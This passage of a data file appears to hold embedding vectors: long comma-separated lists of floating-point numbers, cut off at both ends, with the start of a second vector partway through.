79,-0.010177146,0.003488281,-0.016504005,0.010807976,0.018246047,0.01420714,0.010359363,0.006119558,-0.020475842,-0.007508721,-0.0059895334,-0.010541982,0.09226266,0.0065103592,0.003835907,0.012620254,-0.0046241735,0.004261503,0.034449473,-0.02179992,0.040308427,0.0017343166,-0.009781302,-0.0002316018,-0.009661554,0.012869873,0.01498791,-0.00724752,0.027796509,-0.01393651,0.0050470885,-0.019471418,-0.009234352,0.009111444,0.008571402,-0.009665679,0.022663133,-0.019441359,0.020871332,-0.010436817,-0.012279947,0.010734765,-0.01911755,-0.007714142,0.009241799,-0.00037743617,0.03858761,-0.0144364415,-0.0050106198,0.0107058715,-0.0011113643,-0.019356862,0.038589183,0.01150028,-0.04188039,-0.0070686694,0.009832911,-0.024305662,0.08243502,0.023540009,0.026006078,-0.021012982,0.0047815414,-0.012003898,-0.009794657,0.011502332,-0.00593015,0.0011412941,0.0067825583,0.0094632935,-0.0014380031,0.020156048,0.018950356,-0.008291416,0.00914009,-0.000034876175,-0.0019477532,-0.020308925,-0.010734078,0.0038039943,0.006496796,0.012545375,-0.02185989,0.0076927524,0.02714359,0.00079065363,0.011324146,-0.017217143,0.006085791,0.014468046,0.023921123,0.016675662,-0.006245419,-0.0875861,0.0055383598,0.17568214,0.003820738,0.018449888,-0.00014852316,-0.00044020917,-0.0031186063,-0.056885336,0.0011010633,-0.023859723,-0.022999477,-0.005218517,-0.021580111,-0.025330443,0.031235754,0.012653546,0.0054693385,-0.009280077,-0.027726524,0.009311346,-0.013277768,0.016661793,-0.028522387,0.0023442646,0.010184963,-0.03963218,-0.009768141,0.015868394,-0.021926738,-0.006620595,0.006932588,-0.0002842888,-0.0073771756,-0.006471469,-0.000677906,-0.0049405834,-0.0033779454,0.018966833,0.017296098,0.02193424,-0.015825959,-0.0011261113,0.0057647224,-0.0044052717,-0.018650735,-0.112415336,0.0017458372,0.016635433,-0.0010867968,0.03299572,0.0052092117,0.0054760007,-0.037803724,0.026776275,-0.055802353,-0.02123554,0.002335928,0.0022600386,0.010294755,0.011231961,-0.004909159,-0.02302151,-0.00798661,0.011426906,-0.0047497456,0.02961294,0.0026817226,0.01427899,-0.04462715,-0.029938642,-0.006665645,-0.005553709,0.006748712,-0.0064992853,0.004963086,-0.008512839,0.02275972,-0.007658645,-0.009535939,-0.011275698,-0.042101707,-0.003440078,0.016043214,-0.0141522065,-0.015786866,0.0066602333,-0.0014435071,0.0054723546,0.021926567,-0.017323311,0.038288593,0.017455505,0.027611258,0.0091011785,0.013450004,0.052130055,0.018727971,-0.017838199,0.00806441,0.00045195888,-0.007624618,-0.008676776,-0.023735447,-0.00095751544,0.017468605,-0.004094212,-0.022938984,-0.016217742,-0.020536229,0.03044608,-0.012144989,-0.00032171127,-0.034288786,0.002862266,-0.008535841,-0.025426038,0.013723787,-0.006614018,-0.02452032,0.012722162,0.018958634,-0.009587909,-0.007134641,0.015426787,-0.0026007856,-0.03606639,-0.02627177,-0.013641646,-0.008520257,0.012814237,-0.0014540923,-0.0048062326,0.0034240792,-0.005158637,0.0033628922,-0.005374572,0.0037809897,0.019467672,0.019341107,0.0063960007,0.0023097058,0.010134375,-0.0004509433,-0.052327298,0.01079634,-0.0071714567,-0.011508569,-0.021480875,0.000054451008,-0.018398777,0.0004439964,0.008447697,-0.04653609,0.0040025283,0.004228734,-0.0010141527,-0.0018602292,-0.0059638266,-0.016127756,-0.01051532,-0.022228453,0.0016270863,-0.0065954556,0.0037531278,0.004998186,-0.017388742,-0.00056061696,-0.0074801347,-0.0047528343,0.03584779,-0.0053746738,-0.031736337,-0.00862303,0.02002719,-0.015372324,0.0077534267,0.02797033,-0.0019357803,0.03783948,-0.0050645154,0.03148011,-0.025297357,-0.023904126,-0.022556847,0.011561959,0.007406033,-0.014072718,0.0019490778,-0.021002686,0.03678586,-0.029646615,0.038002584,0.0058823735,-0.0045800786,-0.00080635265,-0.016336812,0.0306191,-0.0067777513,-0.021553116,-0.015981672,0.08449656,-0.012737545,-0.03258484,-0.0042210026,-0.009281175,0.024815282,0.01423235,-0.00061328924,-0.03263665,-0.0028255,-0.031335678,-0.0015082337,-0.010953836,-0.0015495868,-0.016459698,0.003568069,-0.014151866,0.038902268,0.014071068,0.0055101435,-0.00860194,-0.040093258,-0.015388027,0.014963806,0.033855904,0.004270604,0.0010101406,0.005280742,0.002322487,-0.0012524481,0.0023950173,0.015707001,-0.0011326779,-0.0069055697,-0.012048325,-0.025414588,-0.020390945,0.018360186,-0.010375434,0.00032412203,-0.015351756,0.011379615,0.015048427,-0.012697521,0.041938942,-0.017474169,-0.026597893,0.035255615,-0.004319485,-0.008510783,0.0057154596,0.015381503,0.014422056,-0.01307182,-0.0007872726,-0.026046008,0.03271241,-0.007996066,0.0088228695,-0.014724099,0.01593804,-0.0016105997,-0.018235806,-0.006976081,0.013084067,0.0028517775,0.005866678,-0.0011618536,0.014614062,-0.0035907223,-0.0038193094,-0.0070424955,-0.004512373,0.0009320781,-0.00041238885,-0.0047867247,-0.029369507,-0.014886052,-0.021169547,-0.017419878,0.011396734,-0.00254995,-0.00074832933,0.0039509656,-0.034815166,-0.06534083,-0.00928007,0.016849501,-0.029473096,-0.005213982,0.003446588,0.012463448,0.01335636,0.011585922,0.01950525,-0.0034089815,0.003834796,0.016283534,0.01051711,0.010155627,0.010085736,0.020377854,-0.02911339,-0.0071438844,-0.000080701364,-0.021586835,0.0022716746,-0.023525178,0.010535769,-0.01947296,-0.025812833,0.0019753117,0.023107132,-0.02934451,-0.006141477,0.05178237,-0.037281986,0.00033064742,0.012296502,-0.015683208,-0.012971845,-0.02991289,0.0026303632,-0.0120289195,0.038506534,-0.010573124,0.015393079,0.005011272,-0.009992777,-0.000016846572,-0.031073928,0.04900715,-0.019926885,0.008746038,0.029898778,0.004219555,0.017176498,0.012665709,-0.01424385,-0.0038530233,-0.0024459218,-0.0030756637,-0.0044611436,0.017393311,0.0039892313,-0.0015896395,0.005602542,-0.01272051,-0.030929927,0.005316055,0.0026293157,-0.004518622,-0.001970577,-0.0012247843,-0.012332992,0.015507552,-0.00034961378,0.00020324839,0.025653379,-0.023440532,0.005905972,0.010465186,0.0028593696,-0.015630051,-0.017130604,0.01865618,0.011531827,-0.0042804596,0.00542205,0.003972249,-0.03844206,-0.023076234,0.015919808,-0.003668198,-0.0017619993,-0.025733147,-0.011295,-0.0025839098,-0.020810189,0.013255625,0.009799763,0.019592652,-0.008935318,-0.011624287,0.029167663,-0.016880445,-0.016238067,0.0022837974,-0.018860532,0.00043290097,0.0026914477,0.002059452,0.015917705,-0.026616743,-0.017380914,-0.0024655857,0.0060901335,-0.0247608,0.005356605,0.02502814,-0.019228753,0.027326023,-0.01301726,-0.062408283,0.015229468,-0.010328847,-0.016462859,0.009074561,-0.03122772,0.002327979,-0.008952293,0.021150274,-0.011887859,0.001432424,0.017408598,-0.004535758,-0.0041085007,0.00076328614,-0.005702212,-0.021290507,0.011868874,-0.0345493,0.0042640185,0.0059256586,-0.017891508,-0.00030084874,-0.032523796,0.036296785,-0.013250701,-0.021435697,-0.002451414,0.030992968,0.027239759,-0.0022912398,0.017077858,-0.015161863,0.00989235,-0.021766964,-0.026489092,0.002486633,-0.0038325724,0.0053357203,-0.01834826,-0.0010416426,-0.009331992,-0.013082122,-0.020014167,-0.020543588,0.013186583,0.007462657,0.013162189,-0.0040604295,-0.026714753,0.0075492347,0.005774134,-0.031039609,0.0143076815,0.004998913,0.0007153625,-0.034114465,0.0048674415,0.004097873,-0.010123767,0.018676748,0.0034273816,0.006502148,0.005625728,0.013829911,0.010216892,0.019278891,-0.013484622,-0.014047981,-0.029547013,0.006787518,0.0039905943,0.018674694,0.029286118,-0.013878018,0.01721532,0.0029714121,-0.016817104,0.006396205,0.0056157666,0.008855146,-0.0006322285,0.027942728,0.01938986,0.0011600689,-0.029769976,0.007483279,-0.013783753,0.00074410957,0.009640504,0.019539222,-0.009984742,0.00027037985,-0.003505581,-0.008814706,0.038626835,0.018663853,0.027768204,0.013091514,-0.0051372396,0.0043969294,-0.008209523,-0.0062097968,-0.009297679,-0.023313642,0.021147314,-0.007059443,-0.008704507,-0.021954004,-0.005859041,-0.019044971,0.0039212876,-0.010686062,-0.0018261815,0.018272495,0.023658756,-0.030269405,0.017574126,0.0143610835,0.006857362,0.013402579,0.034948155,-0.009734529,-0.030085884,-0.015829524,-0.0071090357,0.0072063757,0.012064093,-0.008943879,-0.002787012,-0.030712193,0.012646299,-0.0049453448,-0.03365917,0.00086321327,-0.007822026,0.006277806,0.11331825,-0.0030784444,-0.03741839,-0.006271768,0.030784806,0.016416527,0.0028137062,-0.0166749,0.012769361,0.006166499,-0.011401618,-0.005637443,0.008602608,0.019606452,0.004886905,0.005487484,-0.017616617,-0.0037925758,0.023716638,-0.018441088,0.016210504,0.00074737665,0.0078798495,-0.007683932,-0.010769424,-0.0028684523,0.02849003,0.0061318884,-0.009642183,0.0065534255,0.021966979,0.0083642015,0.010940816,-0.0005874409,0.0011761416,-0.0038474991,0.017286804,-0.011891884,0.008258606,0.023019662,0.0016311196,0.011185369,0.007186527,0.00036785542,-0.012531995,0.04374611,0.007590148,0.010028837,-0.006596652,-0.010500821,-0.003220922,0.0014731067,-0.008381574,0.0017546011,0.01579596,0.012286594,-0.013512352,0.0073039127,0.028481806,0.003227331,-0.011592575,-0.007689809,-0.006780845,-0.008785255,0.020658245,-0.0027255146,-0.0044015097,0.0008992503,-0.013931274,0.029809479,-0.0053707203,0.01517863,-0.010970927,-0.0069630374,-0.018445529,0.0031626485,0.009341169,-0.0029198246,0.0022489761,0.0024201428,-0.002202992,-0.024199158,-0.027586274,0.0019662702,0.038838647,-0.019834792,-0.034299433,0.0060002347,-0.011339216,-0.01137019,0.035642,0.0034334534,-0.020606168,-0.005186294,-0.006892501,-0.010857785,-0.03712482,-0.11659617,-0.0048897057,-0.003677498,-0.010916129,0.0009977178,-0.0049589393,0.0076155984,-0.0061320392,0.0049088653,0.00096924836,-0.021722173,0.018564757,0.01916686,0.0044456427,-0.010812188,0.024036542,-0.023584269,0.0006073998,-0.0027856613,-0.016450495,0.028954025,0.005090908,-0.024667697,-0.018533675,0.02234948,-0.00047987426,-0.021318242,0.0065768845,0.04320292,-0.011305173,-0.018450484,0.003914289,-0.011793056,0.026562778,0.022048801,-0.016773032,0.0022142567,0.014496914,0.003134523,0.020249272,0.018530618,-0.014994665,-0.0030831564,-0.00052166946,0.014529663,0.0025965218,-0.010068273,0.01415255,0.00916964,-0.0044228616,-0.018199751,-0.010606481,0.027469426,-0.019425176,-0.0052154623,-0.012180565,-0.02875544,-0.0021120976,-0.006501856,0.035466883,0.010602435,0.012687015,0.0021152287,-0.007050691,-0.018552063,0.02236149,0.011028026,-0.012643602,0.007557054,0.024735216,-0.018313773,0.0149485,-0.0023955267,0.009238395,0.030387098,0.015212345,-0.0065841163,0.012275675,0.011914121,0.013117089,-0.009235276,-0.02861491,-0.009971089,0.017913867,-0.0029336775,-0.025120651,-0.0073540374,0.024896067,0.008957341,0.006695853,-0.0018778627,0.028950032,0.0021253866,0.004426497,0.027601993,-0.0142514,0.037452616,0.013143171,0.0015102582,-0.002847539,-0.019191254,-0.014860675,-0.00976819,0.025826482,-0.016118925,0.016425705,0.011533713,-0.010480582,-0.006779886,0.0034762989,0.028389737,-0.013488471,-0.008997891,-0.0036138832,-0.028936405,-0.0073524904,-0.006867305,-0.009150242,0.0042718886,0.0025039434,-0.01234862,0.010485521,0.005381426,-0.012393353,-0.016597763,0.010849116,-0.02575775,0.018322805,0.002293109,-0.0025812322,-0.002882345,0.017538117,0.024671957,-0.0383274,-0.024025243,0.005283482,-0.00093760254,-0.0113758575,-0.013759274,0.0040222025,-0.020832548,-0.016073538,0.017954333,0.0023135282,-0.026789099,0.004026058,0.004395037,-0.0052203382,-0.004977676,0.010209862,0.012297186,-0.0002470361,0.0037316093,0.019221075,0.012663591,0.009059147,-0.0023894638,0.0026385526,-0.002897695,0.00005718805,0.0025937762,0.004805555,0.004720317,-0.0027364646,0.019455872,-0.021832915,0.008369685,-0.0048909797,-0.0045529264,-0.0141924415,-0.0066921865,-0.009863143,-0.008088885,0.0057079117,0.021259243,0.015742753,0.02481365,0.030928727,0.01968972,0.021931844,-0.00063247274,-0.003520454,-0.018349431,-0.0069635436,-0.012983394,0.01375809,0.0019648375,0.0082006045,-0.018131984,0.011040515,0.0088030575,0.0003736036,-0.0028703604,0.019521484,0.008504314,-0.0010541102,-0.015544659,0.0332404,0.012114598,-0.018955981,0.011962552,0.034812015,-0.019521367,-0.02280232,-0.0011783475,-0.011286112,0.0051452545,0.027294314,0.014197518,-0.0029033674,-0.004710829,-0.01827608,-0.0049177893,0.002826773,0.008855176,0.03634925,-0.006138257,-0.02289316,0.013496443,-0.010744779,-0.0032156294,0.0025488157,0.024911722,-0.02000907,0.0004135352,0.027622733,-0.0025723714,0.015744302,-0.0060781925,-0.0027711643,-0.0015159941,-0.007099213,-0.019214945,0.007744225,-0.0023054208,0.009754449,0.009331682,0.000185242,-0.0070864856,0.007961552,0.0024152717,0.031804617,0.026626375,0.0029941713,0.006948405,0.01873381,0.0002219957,0.0046082544,-0.0031975124,0.0090758735,0.0031542904,-0.028752334,0.000370878,-0.0030767429,-0.006685672,0.0024592592,0.022155331,-0.017983336,-0.010227068,0.013568021,-0.021248817,-0.006403372,-0.025309449,0.009306289,-0.016984452,0.020900737,-0.0042239204,-0.0019143403,-0.00047659973,0.005201567,-0.0186782,-0.010389147,-0.0025761675,0.020683553,0.03201861,-0.017717844,-0.010277383,-0.014051201,-0.01127519,0.007926953,-0.015550383,-0.014737249,-0.006347099,0.010427102,0.0071035037,-0.007996252,0.009085412,0.006751586,-0.008111089,-0.0011238167,0.0034136306,0.0015397902,0.0016149948,-0.006858026,-0.014652431,0.028388305,0.006950984,0.0025059553,0.0072919554,0.011691961,0.006582619,0.003299591,0.015732493,0.000060705468,-0.004083304,-0.020706346,-0.0077832416,-0.0025268742,-0.0251781,-0.021113241,-0.0066859066,0.00075503584,0.010420882,0.022837777,0.0113417795,0.005119666,-0.003025793,-0.005679321,0.0062390096,0.0049999845,-0.023693841,0.0034105638,0.016926173,-0.0046362723,-0.005532212,-0.0014074395,0.00745316,0.0020332385,0.008502587,-0.011329612,0.027844058,0.07738082,0.008197092,-0.040300373,0.010595844,-0.0031252,0.0017496212,0.015452517,0.012719963,0.0033128974,0.009289524,0.005751077,-0.020662762,0.0038827,0.0071361763,0.0040951665,-0.0016893512,-0.0032279952,0.01274285,-0.009539128,-0.009616089,0.0073241643,-0.0032484091,0.022540428,0.03831694,0.014291349,-0.026109159,0.008996386,0.01388666,-0.0028552471,-0.010502278,0.003767978,-0.02233642,-0.0019162644,-0.015699081,0.0101427445,-0.003933237,0.019390306,-0.015472365,0.018765034,-0.004028981,0.010741302,-0.012993626,-0.00024488138,-0.01242758,-0.070015065,-0.009368488,0.019590588,-0.020591144,0.020716457,-0.0030178498,-0.030229006,-0.02137853,0.004634867,0.03293639,-0.008001326,-0.009018903,-0.014566071,0.036690738,0.0042015053,-0.00031996355,0.018929068,0.0014095542,0.007298088,-0.013471913,-0.027500276,0.031569064,-0.004018838,-0.028725706,-0.015363516,-0.0021774557,-0.019390633,0.001445258,-0.027297929,0.011318316,0.000088692344,0.009074756,-0.009910902,-0.04313358,-0.017085573,-0.0039697746,0.0035438298,-0.006873134,0.0041744723,-0.03756556,-0.007020599,-0.01596923,0.029364329,-0.013543638,0.010041339,0.037478656,-0.012699277,0.009910655,-0.02681938,0.005187974,0.02725141,0.008388105,-0.012277977,0.037696976,0.0121898465,0.0019781948,0.016057715,0.006058934,0.022728791,0.005300841,-0.009326079,0.0035489302,0.017859664,-0.01178001,-0.021921704,-0.0001232968,-0.003854909,0.027928662,-0.0109696705,0.017791769,0.01170011,-0.029152935,-0.0063493988,-0.00796475,-0.008441698,-0.0073228967,-0.018694445,-0.0020898664,0.025091352,0.02680439,-0.019210882,0.014676415,0.011229958,-0.012057281,-0.0057937023,0.026849804,-0.0046307286,0.031972643,0.018027285,0.0058263717,-0.0051054256,0.01261935,0.010560041,-0.020537578,-0.008042005,0.016535118,0.020217309,-0.00037125312,-0.00019103424,0.00018675569,-0.035508014,-0.028742585,0.007665763,-0.011588497,0.0076587154,-0.010591406,0.010555757,0.013783019,-0.0149270175,0.015464808,0.010467499,-0.0010596197,0.026472358,-0.0070565073,0.0056038443,0.027777728,0.0003645912,0.007696388,-0.011987499,-0.00022123572,-0.03347934,-0.016929781,-0.0317727,-0.00003120369,0.024667768,0.014701212,-0.0021886334,-0.022054553,-0.0125599755,-0.00255242,-0.011887155,0.018517157,0.023645734,0.033927333,0.0055864616,0.0076501593,0.013430742,-0.0050012176,-0.024871912,0.00086376566,-0.004740079,-0.047151588,0.0019735745,0.008957539,0.0057437043,0.037226327,-0.010879185,0.008598917,-0.028607683,-0.007778346,0.00017356442,-0.005751045,0.00988661,-0.012133944,-0.000016756214,0.0057377713,0.010883751,-0.006589112,0.00930393,-0.014341839,-0.0072468384,-0.006772641,0.0049020965,-0.0096772695,-0.018987907,-0.012123878,0.016427118,0.008808459,-0.0041103796,-0.033353142,-0.010048435,-0.002538659,-0.000374737,0.002047133,0.0075724954,-0.0049253423,0.0052083507,-0.005383948,-0.000390475,-0.025719278,-0.018125515,0.027361603,0.014214186,-0.003838408,0.0035977035,0.010557419,-0.013842247,0.0051801517,0.0053753066,-0.02187245,-0.017052308,0.007823325,0.013824902,-0.0054697897,-0.026474249,-0.022912927,0.002171875,-0.022693226,0.005989316,-0.0060805804,-0.03888349,0.01700668,0.0010999894,0.016138073,-0.01090418,0.00583606,0.005820642,-0.014184483,0.0033136155,0.006809957,0.011595048,-0.024841284,0.015739372,0.06496361,0.035455875,-0.012445537,-0.005156588,-0.017115526,0.0023093112,0.021458557,-0.008634564,-0.002533633,-0.0072621587,0.0018635921,0.009264243,-0.00037022686,-0.004905001,-0.025038116,0.017538771,0.004387504,-0.013402655,-0.007536229,-0.014693602,0.016040184,-0.036533546,-0.013979087,0.030117191,0.00086032995,-0.0488513,0.0071470034,0.029315315,-0.024258591,-0.007522778,0.0013152281,0.041221462,0.0122681195,-0.024401069,-0.0011841019,-0.0010258165,0.008197582,-0.000017632186,-0.0027760786,-0.01290188,0.018625148,0.018620815,-0.0056982255,-0.02206219,-0.024648573,-0.021269977,0.011250265,0.014476338,0.0073085413,0.0043104114,-0.007609597,0.011943057,0.0067436756,0.014679066,0.007536771,-0.0036685425,0.00855868,0.013330209,0.027185675,0.004652929,0.030287001,-0.0062112715,-0.0014226974,0.0015378624,-0.0094452435,0.0036945597,-0.008958321,0.010915212,-0.021501277,-0.010919677,0.027216302,-0.023833057,-0.00033818444,0.021276444,-0.028490346,0.023042148,-0.017942348,-0.04282989,0.0013916459,-0.0033682813,-0.0015491928,0.022410542,0.013364471,-0.008394106,0.012507207,0.020336239,0.0010258473,0.020590242,0.0075705345,-0.011547943,0.02965821,0.011797717,-0.0016781219,0.018443136,-0.010638624,-0.0100527415,0.01566099,-0.02606926,0.0134008555,0.030748848,0.0042223698,-0.0014333253,-0.009515486,-0.008934846,-0.0021342556,-0.0055976077,0.0125749,0.02457912,0.0062334505,0.0045917025,0.00041455415,-0.008918626,0.0021301473,-0.006406967,0.009655576,0.007792987,0.016302153,-0.0050092125,0.010726447,-0.0072661974,-0.003902401,0.025505386,0.0044960426,0.041060522,0.00037699463,0.012443429,-0.0045869625,0.0042564906,-0.026731294,-0.0012018412,0.014335836,-0.043899447,-0.0014776707,-0.01250091,-0.007188176,0.014874888,0.028226098,-0.021144303,0.00010702426,-0.012643403,0.018703058,0.0064946166,-0.004036876,0.0022000948,0.00372248,0.0037048762,0.016706511,-0.009319377,0.014378106,0.0087837605,-0.0196885,0.011074934,0.016812805,-0.009082933,-0.0029727384,-0.011581164,0.01604608,0.0016280526,-0.010011623,-0.0015136146,-0.0094794035,0.004904546,0.0027244336,-0.050496355,-0.000740122,0.010244453,-0.014413963,0.016870903,-0.0015589587,0.018043736,-0.016928395,-0.004516144,-0.0049538496,0.0055166488,-0.003611213,-0.0005530056,0.026812874,-0.017023724,-0.0022656114,0.00055785134,0.010976463,0.021090161,-0.015991187,0.0057723024,-0.00026490196,-0.01639713,-0.0049100155,-0.011894522,0.008972679,0.037022375,-0.013106248,0.01813105,-0.016076246,0.014243745,0.020545851,-0.0033841536,-0.024305172,0.035805285,-0.013884954,-0.017067919,-0.006215253,-0.008408098,0.0050087823,0.0026313816,0.005699125,-0.012114115,0.010172874,0.011667012,-0.0027454277,-0.00984141,0.009358251,0.01604192,-0.0036264185,-0.026626725,0.003223148,0.0037066084,-0.016687855,-0.028725268,-0.041811068,0.018731916,-0.005050405,-0.020623347,-0.0035653566,0.0062872795,-0.0052260696,-0.034226704,0.004612551,0.0122769335,0.0028348016,-0.027583597,0.010288089,0.01892703,-0.013659613,-0.00012655958,0.003630944,-0.003421863,0.0102492245,0.013210767,0.000743173,0.0011658326,0.010201078,-0.0063927006,-0.016147902,0.009753122,-0.009641798,0.0103169745,0.0060846843,0.0030995863,-0.003091891,-0.012918258,-0.03805689,0.022335697,-0.014853805,-0.012177399,-0.04302283,-0.014924959,0.0071416693,-0.0025653446,0.0057645673,-0.0066939415,-0.016998976,0.020365767,-0.002432387,0.004878936,0.007424509,-0.00032102485,0.027672654,-0.008876187,-0.010660992,-0.0072160773,-0.011152432,0.013060779,-0.011371312,-0.00089547667,-0.015775733,0.008568737,-0.018646087,-0.010627975,-0.0033212218,0.02498357,0.007835022,-0.02298005,0.030327423,-0.021186179,-0.013950326,0.0069408105,0.019813439,-0.019499416,0.023040371,-0.03582865,-0.0013455224,0.013410483,-0.009813717,-0.029921658,0.018337572,-0.01890755,-0.112452485,-0.032282956,0.018601757,-0.006079969,-0.010442057,-0.006231576,0.017548295,0.010547944,-0.037723903,-0.0033265557,0.011062622,0.0063017434,0.0017507043,0.048952144,-0.001012676,-0.0023031041,-0.007523336,0.0044560647,-0.004765379,-0.013883254,-0.008715098,0.0022831494,0.005188086,0.009934202,0.030475317,-0.0220228,0.0006572999,-0.008215092,0.008234095,0.0049345633,-0.016514193,-0.030057501,-0.0012996512,-0.006507398,0.025835738,-0.0021253137,0.025985887,-0.02749223,-0.01478507,-0.016204009,0.008594906,0.14023048,0.0063364967,-0.012451877,-0.007963154,-0.011709304,-0.015588921,0.0072906455,0.018145688,-0.000063491534,0.022990247,-0.0008249351,-0.01375784,0.01754389,-0.0011806125,-0.000116533396,-0.02370678,0.01887847,0.13468485,0.004632849,-0.0016171895,0.020022636,-0.023095436,0.028264996,0.0082275625,-0.005223112,-0.030878842,0.0067339535,-0.036391135,0.017869644,0.010636298,0.014736858,0.0022471421,0.0341332,-0.0071988264,0.0011652295,0.00465549,-0.008333439,0.011785943,-0.0077292593,0.029534856,0.007390562,-0.0034474293,0.007819699,-0.006150271,-0.009776971,-0.008300997,-0.010072849,-0.012456181,0.017442202,0.014001938,0.01212049,-0.009861512,0.023845851,0.018142888,-0.00035041917,-0.022151947,-0.0064006015,-0.0020878178,-0.024807645,0.021545053,0.00807918,0.0015645028,-0.0019333983,-0.00074472494,-0.006298495,-0.014033036,0.014930146,0.0089536635,-0.028779874,-0.01666489,-0.015796784,-0.008799777,-0.0036530604,0.003705629,0.0032919047,0.011982223,-0.027662816,-0.005907743,-0.005316247,-0.011204292,0.004515494,0.00077977317,-0.022937205,0.0015983642,0.016436685,-0.0056022154,0.0051615303,0.0049687745,-0.00043681415,0.028718904,-0.011723662,0.007451509,0.00023793019,0.0063968333,-0.013143638,0.007029897,0.0019069259,0.005651384,-0.00437494,-0.01725672,-0.018605081,0.016635086,0.006125804,0.013522386,0.0021615317,0.013847017,0.011268049,0.006405607,-0.011105006,0.0014942058,0.009455211,0.030379564,0.009592562,0.00805791,-0.011387306,-0.0053863344,-0.006413661,0.02068302,-0.03802694,0.008614451,0.0069017885,0.002704453,0.026230872,0.016771303,-0.014866815,-0.0021758343,0.026691675,0.005274668,-0.012693225,0.025767738,-0.0011353248,0.021630367,0.017092442,-0.01766735,-0.0047713136,-0.017491875,0.017753769,-0.023305781,0.009771447,-0.026149062,0.00816037,0.025402104,-0.005878481,-0.0044203796,0.003986449,0.0026328133,0.007491415,-0.017688202],[0.004298245,-0.005448184,0.0037169557,-0.023804924,0.0024617093,0.00652777,-0.021760207,0.016366722,0.01559108,-0.0043740002,0.0063119126,0.023721637,-0.027218921,0.004190748,-0.013001471,0.023367846,-0.0011350393,-0.0032417728,0.0027979454,0.0023552373,-0.0021211237,-0.01387289,0.016812447,-0.006953023,0.010788442,0.013483651,-0.0015311708,0.003197513,0.00050397526,-0.0059670755,0.0024695247,0.024090517,-0.005541198,-0.0010678547,0.015511024,0.0130160395,0.006236004,0.006133595,0.0073514017,-0.012516249,0.031815417,0.011621315,-0.006807279,0.033784203,-0.020868337,-0.0096115535,-0.01613312,-0.013214842,-0.011482533,-0.001274793,0.0028995187,0.01932396,-0.009941168,0.008541655,-0.013880226,0.0024086386,-0.009056068,-0.024419501,0.0149720535,-0.007235924,-0.008073751,0.0116437245,0.0011116776,0.0036182944,0.03562525,-0.011540857,-0.0013439902,-0.010609348,-0.011088336,-0.010471015,0.015818719,-0.010611461,0.009342008,-0.00879154,-0.002801354,0.021313919,-0.0038753457,-0.004280754,-0.008779615,-0.0055038976,-0.022464834,0.0022164558,-0.008566273,-0.011465977,-0.0040551005,-0.011457487,-0.006558396,-0.0021983876,0.0019768747,0.00017285893,-0.025406802,0.015472613,0.008028787,0.027970191,0.0152704185,0.04524192,0.014399186,-0.0066044726,-0.009365605,-0.008193199,-0.009223629,-0.0052477256,0.00055199256,0.0062395455,0.00232645,-0.0072261775,-0.017567271,-0.0027850466,0.005735746,-0.006429793,-0.00424442,0.0036415518,0.0027325025,-0.0054294174,0.00083488284,-0.011074792,0.0018598441,0.01541378,-0.0051547103,-0.0009056812,0.0017439596,0.011231517,0.008877149,0.007911835,-0.012285727,-0.00663202,0.0007371115,-0.0028911333,-0.021889275,-0.014753413,-0.007894186,0.027212001,-0.0025188203,-0.0027282292,-0.005813596,0.009522607,0.0014488571,0.00005705231,0.010011436,-0.017775545,0.01580285,0.00915903,0.014707181,0.0060776095,0.014189958,0.015832111,0.0042290604,0.014426073,0.014846911,0.0028609906,0.01163635,0.0058340593,-0.0035106456,-0.010647876,-0.00012913242,0.0035394463,-0.026855793,-0.015903257,-0.0070533818,0.009569266,0.00000981646,-0.011764183,0.0044535897,0.032248463,0.011455905,0.008620805,0.0051087984,0.0028258576,-0.025713384,-0.002225801,0.021221284,0.010742029,0.022420796,0.0059850453,0.021868955,-0.0023888294,0.0068343338,-0.007657516,-0.0049941475,0.008851649,-0.011637145,0.028850498,0.006132659,-0.019580334,0.0065692826,0.014799249,0.009375727,0.013995946,-0.007155882,-0.008752074,-0.0083388295,-0.004605657,-0.0051033925,0.0018459124,-0.008800735,-0.028666433,-0.0020845921,0.11861822,-0.031890586,-0.007851906,-0.0036054219,-0.0034404455,0.006135375,-0.01133891,0.00019356186,-0.037675478,-0.015092134,-0.0036839088,0.0094346525,-0.0018742506,0.022018285,-0.0063679004,0.023421545,0.000498474,0.0073135234,-0.08763719,0.0020323684,0.032803424,-0.023900567,-0.0066889743,0.005452603,0.007615022,-0.010845849,0.0007258496,-0.01976698,0.005684664,0.017978827,0.0018024547,0.009437675,-0.030678937,0.025677245,0.009159218,-0.044049326,0.01383365,-0.016141264,-0.021974215,0.011760455,0.0059479456,0.0093531925,-0.0032603138,-0.010240764,0.01063022,0.022144493,-0.0017359552,-0.022055669,-0.01036868,0.012049412,0.015312483,0.011236294,-0.008950206,-0.0044236556,-0.014395796,0.014146225,0.021742059,-0.0023257227,-0.005568579,0.012253272,0.008852753,-0.0032919429,0.014131398,0.0036996698,0.024220377,-0.02744706,0.007633922,0.029204756,0.015488609,0.013206286,-0.05008927,-0.013461961,-0.0024746158,-0.041342888,0.01143814,0.011812687,-0.021386974,0.013983314,0.004648645,0.0061414423,0.0174619,0.010299631,-0.025933873,-0.008632184,0.0004025806,-0.0098652,-0.015460174,-0.024780296,-0.0037620834,0.025544224,-0.0074378964,0.01435376,-0.006645218,-0.018200725,0.0009427615,0.014030907,0.003603045,0.016185325,-0.01300339,-0.01311344,0.025668604,0.017187987,-0.005612562,0.01278549,-0.012198345,0.027397247,0.010304504,-0.011632911,0.0056882305,0.0029665004,0.028056096,0.00010118792,0.0013529852,-0.0076632947,-0.014903229,0.010764539,0.0088180825,0.0117806895,0.0030528754,0.0071645426,-0.008365491,-0.0042100055,0.013472316,0.026330927,-0.00078045536,-0.016008914,-0.011755974,-0.00021330314,-0.017914325,0.020392803,0.0022195592,0.018195465,0.015993586,0.008749285,-0.008218565,0.003609424,0.0063864104,-0.012760943,0.014078909,0.007826412,0.024809314,-0.0044428445,0.032384153,-0.0053302683,-0.0067335824,-0.019991037,-0.0028667965,-0.00943871,-0.00038572514,0.00023895505,-0.0016937589,0.025382286,0.0030955854,0.008382171,0.010850902,-0.031359397,0.004928269,-0.00321759,-0.0076663117,-0.009221712,-0.012038422,-0.03902711,-0.0044804867,0.026721517,-0.01015121,0.006416472,0.0032001045,0.06189628,-0.0014263173,-0.021453505,-0.007964881,-0.0050632246,-0.0281314,0.02144521,0.020395253,0.001245608,-0.01761799,-0.009065051,-0.013320767,-0.014336524,0.03252654,-0.000005622022,0.0146928225,-0.016634777,0.0048301625,-0.008223835,-0.018753862,0.003309421,-0.009997179,-0.027658675,0.025952943,0.02514518,0.022453213,0.011821421,-0.009866535,-0.006926129,-0.015232287,-0.0027881423,-0.014741733,-0.0058814553,-0.0071324757,-0.02456976,0.0103591215,0.0022331995,0.0032969294,-0.0039742